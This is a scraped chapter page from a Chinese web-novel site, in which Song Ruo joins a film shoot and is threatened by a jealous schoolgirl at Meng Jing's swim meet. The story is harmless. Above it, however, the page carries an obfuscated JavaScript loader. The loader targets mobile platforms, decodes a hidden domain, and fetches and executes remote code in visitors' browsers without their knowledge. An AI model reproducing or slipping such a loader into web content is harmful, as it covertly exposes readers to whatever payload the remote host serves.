98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(16(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

这天孟璟赶早训,就让司机代劳送未婚妻。

宋若上车时,她乖乖巧巧站在道旁,两只眼睛弯弯的,宋小姐请放心,到时候我会请杨叔去接你,祝宋小姐一路顺风。

孟家司机老杨把她送到拍摄地点,看她与时旌接上头,才转身离去。

时旌一双眼睛油锅里练出来的,看小宋这阵势,如何不猜着七八分,不过她并非那种看人下菜碟的主儿,无论对方什么背景出身,但凡演戏在行的,在她心里,就是好演员,别的,哪怕就是某国总统本人亲自来了,她也不会放在心上。因此待宋若如常,考虑到她还没有经纪人和助理之类,就让自己的一个小助理带她去酒店房间。

宋若谢过她,跟着那染着紫色头发的小助理走。

我们时导考虑到若若你天真烂漫,应该喜欢海景房,所以特意把这一间让给了你。小助理是热情话痨型的,一路说个不住,在前台带她办理登记入住,又领她上楼,刷开一间房,将房卡交给她,站在门口,绯红着脸说若若,你也许要休息一下,我在外面等你十分钟,然后我们去片场。

宋若不好意思,看看她胸前的工作牌,揣度着喊了一声小付姐,说道您进来坐吧,我洗把脸就跟您过去。

小付嘿嘿笑了两声,也不多推辞,进来房间,在小圈椅内坐下,看宋若放下行李,又进洗手间洗了脸,将头发梳起来,比刚才披着头发的模样更朝气更靓丽了。

她拍着脸上的小水珠,轻轻说这房间好大啊。

小付清清嗓子,红了脸,其实我刚刚话没说完。这本来呢,是个双人大床房,是时导和她女朋友住的,但是林小姐特别喜欢你,说你是她慧眼识珠发现的千里马,她让时导把这间给你了。

宋若不好说什么,只点了点头替我谢谢时导还有林小姐。

新的少年版傅堇年饰演者,是和宋若同一天抵达剧组的,名叫季铭,年纪虽然是二十七岁,却是个艺龄将近十年的艺人,最初是以校草人设出道,十年后的今天,人家看到他,依旧说哦xx学院那个校草!时旌若非考虑到进度拖不起,其实还是更属意新面孔。不过季铭淡出荧幕多年,和新面孔其实也差不离,又是老友推荐,却之不恭,也就应承下来。

与初出道就蹿红的明威不同,季铭在娱乐圈沉浮已久,已经历尽炎凉冷暖,整个人的气质磐石般沉稳。以宋若的眼光看去,他与傅堇年的特质更为贴近。走戏也十分顺利,几乎都是一条过。时旌讶异于自己的运气,这两个校园戏演员都是踏破铁鞋无觅处得来全不费工夫,没想到还真神了,比花三年五载慢慢寻访的还要熨帖。

两个人十几场戏,开拍二天就过了五场,有好些还是按照时旌的要求,精益求精力求完美,多次反复拍摄的。

按照进度安排,孟璟比赛的那天,恰好拍的是都市剧情,负责校园戏的宋若和季铭都休息,正好连假都不用请了。当日清早杨叔就在酒店楼下等着了。宋若坐上车的时候,只见碧空如洗,万里无云。其实就算孟璟不威逼利诱,撒娇耍赖,她到了这天,多半也会去给孟璟加油。因为那句爷爷不在,你是唯一的亲人太扎心了,至少在这方面,她和她算是同病相怜。

车行到一半,她想起小娇妻原本是由孟姗姗引进剧情的,也就是说,至少要等到她陪同孟爷爷回国,孟璟才有正确的人生方向。在这之前,她姑且忍耐。

这天,华市的市游泳馆却是非比寻常的热闹。

亲友团都来给选手们呐喊助威。

吕清義最近转学到三中,迅速成为三中的一姐,她对孟璟上回一见钟情,因为是个响当当的行动派,上次闹了个轰轰烈烈的表白事件,差一点连累孟璟被记过,蛰伏了一阵,这天也带了一众小喽啰们前来助阵,希望能找到机会冰释前嫌。她手上拿个望远镜,一进来霸气落座,找到孟璟其人,看着那修长挺拔的身材先闹了个大红脸,转眼却发现孟璟一会儿看钟,一会儿看入口,一会儿在观众席寻寻觅觅。

吕清義问自己的小喽啰们她这找谁呢?

大家当然都不知道答案。

对孟璟如此特殊的人,吕清義能不在意吗。她密切注视着场馆内的动态。

临近开赛时间八点整,门口豁然一开,进来个穿白裙子的长发女生,在赛场上的孟璟忽然就笑容洋溢,朝刚进门的那个女的大力挥了挥手。不止孟璟对这女的表示好感,观众席中许多人也朝她行注目礼。吕清義拿望远镜看个仔细,顿时就上火了,她行事风风火火,最讨厌的就是这一类娇滴滴的,觉得她们惺惺作态,偏孟璟感兴趣的是这一类?啥破眼光?

她的望远镜让她丢在了地上,砰地一声,目镜碎了。

宋若根据林尽染微信里的提示找到高一七班的后援团阵地,刚胜利会师,赛场上的广播就播报了孟璟的名字,林尽染笑嘻嘻地说我们是七班,她又是七号,真有缘。

李琪也说好彩头。

孟璟最后朝她们这个方向看了一眼,挥了挥纤长的手臂,转身开始做热身准备。

赵媛媛忽地拉着宋若说若若,你猜孟璟会得第几名呀。

说话间,抹香鲸已经入水了。

宋若还来不及答复,忽然感到头顶一暗,有人挡住了光线。坐在这附近的几个女生都纷纷抬头去望,只看到个嚼着口香糖,浓眉大眼颇有几分英气的姑娘,她长得并不难看,可是眉目间很重的煞气,吓得这里一众人等压根不敢则声。

孟璟今天的状态特别好,发小叫她抹香鲸,她有点囧得慌,今天在赛道里,她却感觉自己真化身成了水族生物,与水融为一体了。出水时她听到热烈的呐喊声,第一反应就是朝未婚妻待的那个位置看过去,这一望,周遭的喧嚣呐喊顿时化为乌有宋若坐的座位怎么空下来了?

盛雪是下一拨上场的,本想恭喜一下孟璟,见她愣在池子里,走过去,蹲下来泼点水干嘛呢你,泡鱼肝油啊?

孟璟上岸来,在深蓝色的连体泳衣外裹了条雪白的毛巾,不去拾掇自己,反而就那样杀进观众席里边了。引起一浪接一浪的尖叫。她走到林尽染旁边,见她哭得上气不接下气,就知道不必问她,转而问侧边一个扶着她的李琪怎么回事,李琪说宋若被抓走了,我和林尽染留下来转告你,其他人追过去了。

吕清義的一众小跟班儿将追上来的一年级七班学生远远堵在一个角落,吕清義则亲自关照宋若本人。

你是孟璟什么人。吕清義瞪着她。

宋若做梦也没想到自己还会被情敌威胁。二十岁高龄再次遭受校园暴力,着实搞笑,她抿着嘴,一言不发。

不想被打烂这张脸就说话。声调陡然拔高了七八度。

这是游泳馆的后方,广播声似乎是在播成绩,朦朦胧胧仿佛听到孟璟的名字,具体在说什么却听不清了。

你们什么关系,这是我最后一次问你。

朋友啊。宋若面露微笑。

你,好你个臭傻帽儿还敢嘲笑我这气势如虹的大姐大将手抬高,眼看就要挥下来的瞬间,啪的一声,她的手腕被扣住了。

两人同时看过去,只见头发湿漉漉的孟璟目露凶光站在侧边,从牙齿缝里挤出两个字走开。

宋若觉得跟眼下这场景一比,自己穿书以来的所有剧情,包括穿书本身,都不算狗血,这一波,才叫狗血中的精华。她扶了扶额头。

吕清義眼眶红了,盯着孟璟说你,你护着她。

当然。孟璟声音里透露出萧杀之余,也透着几分无奈,你要伤害她,除非从我的尸体上踏过去。

宋若什么中二台词。

吕清義的手颓然落下,她蹲下去,呜呜地哭了起来。

孟璟显然也不知道该怎么办,她抓了抓头发,眼尾狭长的凤眼朝宋若看了一眼,意思是问她有没有事。宋若却不理她,手轻轻拍了拍地上那个的肩膀。方才推推搡搡押送她来这里的路上,她已经做过自我介绍了,因此宋若得以直接喊她的大名吕清義同学。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间